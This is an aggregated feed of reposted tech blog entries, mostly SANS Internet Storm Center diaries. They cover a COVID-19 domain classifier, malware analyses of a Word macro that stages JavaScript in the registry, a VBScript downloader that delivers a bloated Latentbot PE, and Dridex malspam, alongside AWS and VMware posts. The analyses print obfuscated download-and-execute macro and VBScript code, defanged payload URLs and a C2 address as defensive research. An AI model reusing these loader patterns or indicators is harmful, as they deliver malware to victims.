Covid19 Domain Classifier, (Sat, Mar 28th)

This post was originally published on this site

Johannes started a Covid19 Domain Classifier here on our Internet Storm Center site.

From SANS NewsBites Vol. 22 Num. 025:

Help Us Classify COVID-19 Related Domains

These last couple of weeks, criminals have been using COVID-19 for everything from selling fake cures to phishing. Every day, several thousand domains are registered for COVID-19 related keywords. We are trying to identify the worst, and classify the domains into different risk categories. If you have some time this weekend, please help us out by checking out some of these domains. To participate, see https://isc.sans.edu/covidclassifier.html. The domain data is based on a feed provided by Domaintools and we will make the results of this effort public for download as soon as we have a “critical mass” of responses.

When you log in with your account to the SANS ISC site, you’ll get a list of 10 domains to classify, like this:

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Malicious JavaScript Dropping Payload in the Registry, (Fri, Mar 27th)

This post was originally published on this site

When we speak about “fileless” malware, it means that the malware does not use the standard filesystem to store temporary files or payloads. But they need to write data somewhere in the system for persistence or during the infection phase. If the filesystem is not used, the classic way to store data is to use the registry. Here is an example of a malicious JavaScript code that uses a temporary registry key to drop its payload (but it also drops files in a classic way).

The malware was delivered via a Microsoft Word document:

remnux@remnux:/malwarezoo/20200327$ oledump.py information_03.26.doc 
A: word/vbaProject.bin
 A1:       576 'PROJECT'
 A2:       104 'PROJECTwm'
 A3: m    1127 'VBA/ThisDocument'
 A4:      3798 'VBA/_VBA_PROJECT'
 A5:      2201 'VBA/__SRP_0'
 A6:       206 'VBA/__SRP_1'
 A7:       348 'VBA/__SRP_2'
 A8:       106 'VBA/__SRP_3'
 A9: M    2319 'VBA/a4bLF'
A10: M    2026 'VBA/acpqnS'
A11: M    2457 'VBA/ajzdY'
A12:       913 'VBA/dir'
A13: m    1171 'VBA/f'
A14:        97 'f/x01CompObj'
A15:       284 'f/x03VBFrame'
A16:        86 'f/f'
A17:     37940 'f/o'

Several macros are present and are easy to decode:

Sub AutoOpen()
  main
End Sub

And:

Sub main()
  ajKTO = StrReverse(ae5RXS("e$x$e$.$a$t$h$s$m$$2$3$m$e$t$s$y$s$$s$w$o$d$n$i$w$$:$c$", "$", ""))
  akYREj = StrReverse(aQqnur("m$o$c$.$t$f$o$s$o$r$c$i$m$$a$t$a$d$m$a$r$g$o$r$p$$:$c$", "$", ""))
  aXlTxC = StrReverse(airmZ6("l$m$t$h$.$x$e$d$n$i$$a$t$a$d$m$a$r$g$o$r$p$$:$c$", "$", ""))
  Call VBA.FileCopy(ajKTO, akYREj)
  Set axe16 = f.i
  atk8Jw aXlTxC, axe16.value
  Shell akYREj & " " & aXlTxC
End Sub

The three lines containing StrReverse() are easy to deobfuscate, you just have to remove the ‘$’ characters and reverse the string:

StrReverse(ae5RXS(“e$x$e$.$a$t$h$s$m$$2$3$m$e$t$s$y$s$$s$w$o$d$n$i$w$$:$c$”, “$”, “”)) = “c:windowssystem32mshta.exe”
StrReverse(aQqnur(“m$o$c$.$t$f$o$s$o$r$c$i$m$$a$t$a$d$m$a$r$g$o$r$p$$:$c$”, “$”, “”)) = “c:programdatamicrosoft.com”
StrReverse(airmZ6(“l$m$t$h$.$x$e$d$n$i$$a$t$a$d$m$a$r$g$o$r$p$$:$c$”, “$”, “”)) = c:programdataindex.html

The function atk8Jw() dumps the payload:

Public Function atk8Jw(ar9a1t, afn6Jc)
  Open ar9a1t For Output As #1
  Print #1, afn6Jc
  Close #1
End Function

The file index.html is created based on the content of a hidden form in the Word document (called ‘f’).

The second stage is executed via mshta.exe. This piece of code uses the registry to dump the next stage:

<p id="content">6672613771647572613771646e726137 ...(very long string)... 2613771642972613771643b7261377164</p>
...
var aYASdB = "HKEY_CURRENT_USERSoftwaresoftkey";
...
aB9lM.RegWrite(aYASdB, a0KxU.innerHTML, "REG_SZ");
...
aUayK = aB9lM.RegRead(aYASdB)
...
aB9lM.RegDelete(aYASdB)

The content is the ‘id’ HTML element is hex-encoded and obfuscated with garbage characters. Once decoded, we have a new bunch of obfuscated code.

It fetches the next stage from this URL: 

hxxp://his3t35rif0krjkn[.]com/kundru/targen.php?l=swep4.cab

Unfortunately, the file was already removed and I was not able to continue the analyzis…

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

New – Low-Cost HDD Storage Option for Amazon FSx for Windows File Server

This post was originally published on this site

You can use Amazon FSx for Windows File Server to create file systems that can be accessed from a wide variety of sources and that use your existing Active Directory environment to authenticate users. Last year we added a ton of features including Self-Managed Directories, Native Multi-AZ File Systems, Support for SQL Server, Fine-Grained File Restoration, On-Premises Access, a Remote Management CLI, Data Deduplication, Programmatic File Share Configuration, Enforcement of In-Transit Encryption, and Storage Quotas.

New HDD Option
Today we are adding a new HDD (Hard Disk Drive) storage option to Amazon FSx for Windows File Server. While the existing SSD (Solid State Drive) storage option is designed for the highest performance latency-sensitive workloads like databases, media processing, and analytics, HDD storage is designed for a broad spectrum of workloads including home directories, departmental shares, and content management systems.

Single-AZ HDD storage is priced at $0.013 per GB-month and Multi-AZ HDD storage is priced at $0.025 per GB-month (this makes Amazon FSx for Windows File Server the lowest cost file storage for Windows applications and workloads in the cloud). Even better, if you use this option in conjunction with Data Deduplication and use 50% space savings as a reasonable reference point, you can achieve an effective cost of $0.0065 per GB-month for a single-AZ file system and $0.0125 per GB-month for a multi-AZ file system.

You can choose the HDD option when you create a new file system:

If you have existing SSD-based file systems, you can create new HDD-based file systems and then use AWS DataSync or robocopy to move the files. Backups taken from newly created SSD or HDD file systems can be restored to either type of storage, and with any desired level of throughput capacity.

Performance and Caching
The HDD storage option is designed to deliver 12 MB/second of throughput per TiB of storage, with the ability to handle bursts of up to 80 MB/second per TiB of storage. When you create your file system, you also specify the throughput capacity:

The amount of throughput that you provision also controls the size of a fast, in-memory cache for your file share; higher levels of throughput come with larger amounts of cache. As a result, Amazon FSx for Windows File Server file systems can be provisioned so as to be able to provide over 3 GB/s of network throughput and hundreds of thousands of network IOPS, even with HDD storage. This will allow you to create cost-effective file systems that are able to handle many different use cases, including those where a modest subset of a large amount of data is accessed frequently. To learn more, read Amazon FSx for Windows File Server Performance.

Now Available
HDD file systems are available in all regions where Amazon FSx for Windows File Server is available and you can start creating them today.

Jeff;

BuildforCOVID19 Global Online Hackathon

This post was originally published on this site

The COVID-19 Global Hackathon is an opportunity for builders to create software solutions that drive social impact with the aim of tackling some of the challenges related to the current coronavirus (COVID-19) pandemic.

We’re encouraging YOU – builders around the world – to #BuildforCOVID19 using technologies of your choice across a range of suggested themes and challenge areas, some of which have been sourced through health partners like the World Health Organization. The hackathon welcomes locally and globally focused solutions and is open to all developers.

AWS is partnering with technology companies like Facebook, Giphy, Microsoft, Pinterest, Slack, TikTok, Twitter, and WeChat to support this hackathon. We will be providing technical mentorship and credits for all participants.

Join BuildforCOVID19 and chat with fellow participants and AWS mentors in the COVID19 Global Hackathon Slack channel.

Jeff;

Very Large Sample as Evasion Technique?, (Thu, Mar 26th)

This post was originally published on this site

Security controls have a major requirement: they can’t (or at least they try to not) interfere with normal operations of the protected system. It is known that antivirus products do not scan very large files (or just the first x bytes) for performance reasons. Can we consider a very big file as a technique to bypass security controls? Yesterday, while hunting, I spotted a very interesting malware sample. The malicious PE file was delivered via multiple stages but the final dropped file was large… very large!

It started with a classic phishing email containing a shortened URL:

hxxp://bit[.]ly/2WFm2wY

(Tip: Not many people are aware that if you add a ‘+’ sign at the end of a bit.ly URL, you won’t be redirected automatically to the real URL but a page with the link will be returned instead. This can help you to decide if the shortened URL is malicious or not.)

This URL redirected to a second shortener service:

hxxps://rebrand[.]ly/9zcj74uFAT039

Finally, the real URL was visited:

hxxps://cld[.]pt/dl/download/6812fec0-88b6-4e41-9eb1-e5cb06be83e0/sapotransfer-5a1a0746e3e7ePG/ER-3939874-FT.zip?download=true

The ZIP archive (SHA256:7dc6b78fac829e25232fa5fa885464d25bdef45fa577d10f3e73fe393e1c2c19) contains a VBScript file ‘ER-3939874-FT.vbs’ (SHA256:494b9fc1957434ac5626d5fa17189db09f1acea00c856caf107d7bb22fde5ec5)

A quick analyzis reveals that the code is very simple:

It downloads another piece of code from an URL:

Set Dnlakdnsks = CreateObject("Msxml2.XMLHttp.6.0")
Dnlakdnsks.open "GET", Cfgghhhh("_kkgj1&&gXjkY`e%Zfd&iXn&>D)/_E?Y"), False
Dnlakdnsks.send

And executes it:

Function DJierorpoop(WWWWWw)
  ExecuteGlobal WWWWWw
End Function
DJierorpoop Dnlakdnsks.responseText

The URL (‘_kkgj1&&gXjkY`e%Zfd&iXn&>D)/_E?Y’) is deobfuscated via the following function:

Function Cfgghhhh(G1g)
  For DnnKS = 1 To Len(G1g)
    MDNSLS = Mid(G1g, DnnKS, 1)
    MDNSLS = Chr(Asc(MDNSLS)+ 9)
    SSXSLDKSNS = SSXSLDKSNS + MDNSLS
  Next
  Cfgghhhh = SSXSLDKSNS
End Function

We can simulate it in Python. The string is parsed character by characters, converted to their ASCII value and shifted by 9 positions:

>>> str='_kkgj1&&gXjkY`e%Zfd&iXn&>D)/_E?Y'
>>> out=''
>>> for c in str:
...     out = out + chr(ord(c)+9)
...
>>> out
'hxxps://pastebin[.]com/raw/GM28hNHb'

This pastie contains more VBScript code and, once executed, it performs the following actions:

It downloads the next stage from the Internet. The URL is encoded using the same technique (see above) but the characters are shifted by 10 instead of 9. The deobfuscated URL is:

hxxp://160[.]20[.]147[.]130:1948/DNsikidstrou9095.iso

The .iso file is a big chunk of Base64 encoded data. Once decoded, we have a ZIP archive:

remnux@remnux:/malwarezoo$ wget hxxp://160[.]20[.]147[.]130:1948/DNsikidstrou9095.iso
remnux@remnux:/malwarezoo$ base64 -d DNsikidstrou9095.iso | file -
/dev/stdin: Zip archive data, at least v2.0 to extract
remnux@remnux:/malwarezoo$ base64 -d DNsikidstrou9095.iso >DNsikidstrou9095.iso.zip
remnux@remnux:/malwarezoo$ unzip DNsikidstrou9095.iso.zip
Archive:  DNsikidstrou9095.iso.zip
  inflating: DNsikidstrou9095.exe

The PE file (SHA256:a5d786ee432dd486d6773621301997c3143dc47a8525c683ff6281990ff9d14d) is very large:

remnux@remnux:/malwarezoo$ $ ls -lh DNsikidstrou9095.exe
-rw-r--r-- 1 remnux remnux 321M Mar 25 08:20 DNsikidstrou9095.exe

321MB is really big! This trick is very easy to bypass many security controls.  

Often, such files are padded with zeroes to make them bigger but it was not the case this time. Let’s inspect the PE file with PEStudio[1]. The PE file format is quite complex[2] and contains ‘sections’. Sections are ‘areas’ in the file that store different types of data:

.text : contains executable code
.data: contains ‘data’ used by the program

An interesting one is ‘.rsrc’ which contains the ‘resources’. As you can see, this section takes more than 97% of the complete file size:

Resources can be any type of data embedded in the application. Common data are icons, cursors, images, etc.
In our malicious PE, we see three big resources:
 

PEStudio can dump resources to disk. Let’s dump them and see what we have:

remnux@remnux:/malwarezoo$ file  DNsikidstrou9095.*.bmp
DNsikidstrou9095.exe.0.bmp: PC bitmap, Windows 3.x format, 9161 x 7054 x 24
DNsikidstrou9095.exe.1.bmp: PC bitmap, Windows 3.x format, 4267 x 5293 x 24
DNsikidstrou9095.exe.2.bmp: PC bitmap, Windows 3.x format, 4414 x 4959 x 24

Files look very similar:


It does not seem to be computer-generated. I tried to find hidden data in the file, but they look ‘clean’.
The next question is: “Are these sections used by the program?”

They are many tools to play with resources but I like ResourceTuner[3]. The tool is not free but is available in demo mode for 30 days, more than enough to play with it from time to time. The tool allows you to browse resources embedded in a PE file but also to remove them:

The newly generated file has now a size of (only) 8371200 bytes (SHA256:d8d3665affc98cba7942674a51713878b903f8c19034075eb469c3ace3d6aeb6)

Let’s try to execute it again in a sandbox… Great, it worked perfectly!

It’s a variant of the Latentbot[4] that communicates with a C2 @ %%ip:18.231.122.158%%.

[1] https://www.winitor.com
[2] https://docs.microsoft.com/en-us/windows/win32/debug/pe-format
[3] http://www.heaventools.com/resource-tuner.htm?
[4] https://blog.malwarebytes.com/threat-analysis/2017/06/latentbot/

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Configuring Fluentbit on VMware Cloud PKS for…

This post was originally published on this site

A great article describing how to send log from Kubernetes Clusters to a centralized system (here Elasticsearch) on AWS. Monitoring is a key part when we are talking K8s for many reasons that are quite obvious but sometimes forgotten. I will never repeat enough this. Monitoring if the key for happy systems, happy administrators and … Read more Configuring Fluentbit on VMware Cloud PKS for…

Join us for the vSphere 7 Launch Event!

This post was originally published on this site

Join us for the vSphere 7 Launch Event! vSphere 7 is VMware’s biggest set of innovations since the launch of ESXi. With all the excitement around this new generation of vSphere and the app modernization solutions we felt our loyal vSphere users deserve an event just for themselves! With the help of the hosts from … Read more Join us for the vSphere 7 Launch Event!

NSX-T: vCenter and NSX-T Inventory out of Sync (Hosts in vSphere not showing up in NSX-T)

This post was originally published on this site

Summary:
NSX-T loses synch w/ vCenter inventory, but statuses don’t appear to show an issue.  Basically, you add a host to a vCenter cluster, NSX-T bits should start to automatically installing on new host.  Assuming you’ve created a Transport Node Profile and associated w/ the cluster.  The problem is that NSX-T doesn’t see the new host and its link to the compute manager (vCenter) looks fine.

Looks fine, Y U NO WORK!?

So what’s going on here? 
This appears to affect NSX-T 2.5 and 2.5.1.  Cause is unknown.

Workaround:
Restart the cm-inventory service on each NSX-T mgmt/controller node using API or CLI.

Details:
If you were to query the status of the cm-inventory via API or CLI, you could query all 3 manager/controller nodes and get a status of running.  Even if the primary node associated w/ the VIP, if configured, is not necessarily in charge of inventory.  So you could restart the cm-inventory service till you are blue in the face and get nowhere because another node is actually responsible for maintaining the sync. 

Even so, with this particular problem, they would all look healthy.  You’d have to dig into the logs to find the issue.  Thankfully Nathan Pyle from VMware helped us find the issue and provided us w/ a workaround solution until the bug is addressed in a future version.

API Method:
GET /api/v1/node/services/cm-inventory/status
POST /api/v1/node/services/cm-inventory?action=restart

CLI Method:
get service cm-inventory
restart service cm-inventory 

Recent Dridex activity, (Wed, Mar 25th)

This post was originally published on this site

Introduction

This week, I’ve seen a lot of malicious spam (malspam) pushing Dridex malware.  Today’s diary, provides a quick rundown on the types of malspam I’ve seen, and it also covers what an infected Windows host looks like.

The malspam

I’ve seen at least 3 different themes used during the first two days of this week from malspam pushing Dridex.  One was a voicemail-themed email.  Another used a DHL them.  Finally, I saw a FedEx-themed email pushing Dridex.  See the images below for examples.


Shown above:  Malspam using a voicemail theme to push Dridex.


Shown above:  Malspam using a DHL them to push Dridex.


Shown above:  Malspam using a FedEx theme to push Dridex.

An infected Windows host

I infected a lab host using a URL from one of the emails shown above.  See images below for details.


Shown above:  Clicking on the link in the Fedex email.


Shown above:  Extracting a VBS file from the downloaded zip archive.


Shown above:  Running the VBS file drops the initial DLL for Dridex.


Shown above:  Dridex persistence mechanism 1 of 3–a scheduled task.


Shown above:  Dridex persistence mechanism 2 of 3–a regisrty update.


Shown above:  Dridex persistence mechanism 2 of 3–a shorVcut in the Windows startup menu.

Indicators

URLs from the three email examples:

  • hxxp://bienvenidosnewyork[.]com/app.php
  • hxxp://photoflip[.]co[.]in/lndex.php
  • hxxp://everestedu[.]org/lndex.php

Zip archive downloaded from link in one of the malspam:

VBS file extracted from the above zip archive:

Initial Dridex DLL seen after running VBS file:

File hashes for Dridex DLLs made persistent during the infection:

Final notes

Of note, zip archives from links in the emails appeared to be different names/sizes/hashes each time I downloaded one, even if it was from the same link.  Also, when a Dridex-infected Windows host is rebooted, the locations, names, and file hashes of the persistent Dridex DLL files are changed.

Dridex remains a feature of our threat landscape, and it will likely continue to be, at least in the foreseeable future.  Windows 10 hosts that are fully patched and up-to-date have a very low risk of getting infected from Dridex, so it pays to follow best security practices.

Brad Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.